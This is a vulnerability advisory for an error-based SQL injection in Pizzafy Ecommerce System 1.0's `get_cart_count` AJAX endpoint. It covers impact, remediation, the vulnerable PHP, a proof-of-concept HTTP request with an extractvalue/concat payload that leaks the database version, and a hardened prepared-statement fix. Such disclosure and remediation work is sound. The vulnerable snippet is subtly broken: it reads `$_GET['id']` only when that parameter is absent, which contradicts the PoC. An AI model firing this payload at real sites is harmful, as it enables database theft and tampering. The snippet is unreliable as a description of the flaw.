# Vulnerability Summary: SQL Injection Vulnerability in Pizzafy Ecommerce System 1.0

## Vulnerability Overview

* **Vulnerability Type**: Error-Based SQL Injection
* **Affected Version**: Pizzafy Ecommerce System 1.0
* **Vulnerable Location**: `get_cart_count` function in the `/pizzafy/admin/ajax.php` interface
* **Triggering Parameter**: `id` parameter
* **Description**: The backend code does not validate or filter the user-supplied `id` parameter and concatenates it directly into the SQL query string. Because the raw database error text is returned to the client, an attacker can craft SQL expressions that surface sensitive database information in the error message.

## Impact Scope

* **Confidentiality**: Leakage of database schema and user credentials.
* **Integrity**: Unauthorized deletion or modification of data.
* **Availability**: Service unavailability caused by malicious deletion.
* **Privilege Escalation**: Acquisition of administrator privileges through session data hijacking.

## Remediation

1. **Use Prepared Statements**: Employ parameterized queries (e.g., `mysqli_prepare`) to prevent SQL injection.
2. **Input Validation**: Perform strict type checking on parameters such as `id` (e.g., allowing only integers).
3. **Database Privilege Restriction**: Limit database user privileges to minimize potential damage.
4. **Error Handling**: Avoid exposing detailed database error messages in responses.

## Vulnerable Code

```php
public function get_cart_count() {
    if(!isset($_SESSION['login_user_id']))
        return "0";
    $user_id = $_SESSION['login_user_id'];
    if (!isset($_GET['id'])) {
        $user_id = $_GET['id'];   // user-controlled value, no validation or casting
    }
    // $user_id is interpolated straight into the query string: the injection point
    $sql = "SELECT SUM(qty) as total FROM cart WHERE user_id = $user_id";
    $result = $this->conn->query($sql);
    if (!$result) {
        return $this->conn->error;   // raw MySQL error text sent to the client, which is what makes the injection error-based
    }
    if($result && $result->num_rows > 0) {
        $row = $result->fetch_assoc();
    }
    if(!is_numeric($row['total'])) {
        return json_encode($row);
    }
    return $row['total'] ? (string)$row['total'] : "0";
}
```

## Proof of Concept (PoC)

**GET Request Example:**

```http
GET /pizzafy/admin/ajax.php?action=get_cart_count&id=1%20and%20extractvalue(1,%20concat(0x7e,%20version())) HTTP/1.1
Host: localhost
sec-ch-ua: 
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win6; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/pizzafy/index.php?page=home
Accept-Encoding: gzip, deflate
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cookie: PHPSESSID=n149kjl2vwd4ra1063qunr95
Connection: close
Content-Length: 0
```

**Injected `id` Parameter Value (URL-encoded):**

```text
id=1%20and%20extractvalue(1,%20concat(0x7e,%20version()))%20--
```
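A hardened version of `get_cart_count` that applies remediation items 1, 2 and 4 above. This is an added example, not the project's own code; it assumes `$this->conn` is a `mysqli` connection, as in the vulnerable snippet, and keeps the optional `id` override only so the contrast with the original is direct.

```php
<?php
// Added example: hardened get_cart_count() with a prepared statement,
// strict integer validation and no database error text in the response.
// Assumes $this->conn is a mysqli connection, as in the vulnerable snippet.
class CartCountExample
{
    private mysqli $conn;

    public function __construct(mysqli $conn)
    {
        $this->conn = $conn;
    }

    public function get_cart_count(): string
    {
        if (!isset($_SESSION['login_user_id'])) {
            return "0";
        }
        $user_id = (int)$_SESSION['login_user_id'];

        // Remediation 2: the optional id override must be a positive integer;
        // a value such as "1 and extractvalue(...)" fails validation and is rejected.
        if (isset($_GET['id'])) {
            $id = filter_var($_GET['id'], FILTER_VALIDATE_INT,
                             ['options' => ['min_range' => 1]]);
            if ($id === false) {
                http_response_code(400);
                return "0";
            }
            $user_id = $id;
        }

        // Remediation 1: parameterized query; the value is bound, never spliced into SQL text.
        $stmt = $this->conn->prepare(
            "SELECT SUM(qty) AS total FROM cart WHERE user_id = ?"
        );
        if ($stmt === false || !$stmt->bind_param("i", $user_id) || !$stmt->execute()) {
            // Remediation 4: keep the detail in the server log, return nothing useful to the client.
            $detail = ($stmt === false) ? $this->conn->error : $stmt->error;
            error_log("get_cart_count failed: " . $detail);
            return "0";
        }
        $stmt->bind_result($total);
        $stmt->fetch();
        $stmt->close();

        return $total !== null ? (string)$total : "0";
    }
}
```

With this version the PoC request above receives a `400` response and the database is never queried, and a genuine query failure produces a `0` count plus a server-side log entry instead of the MySQL error string.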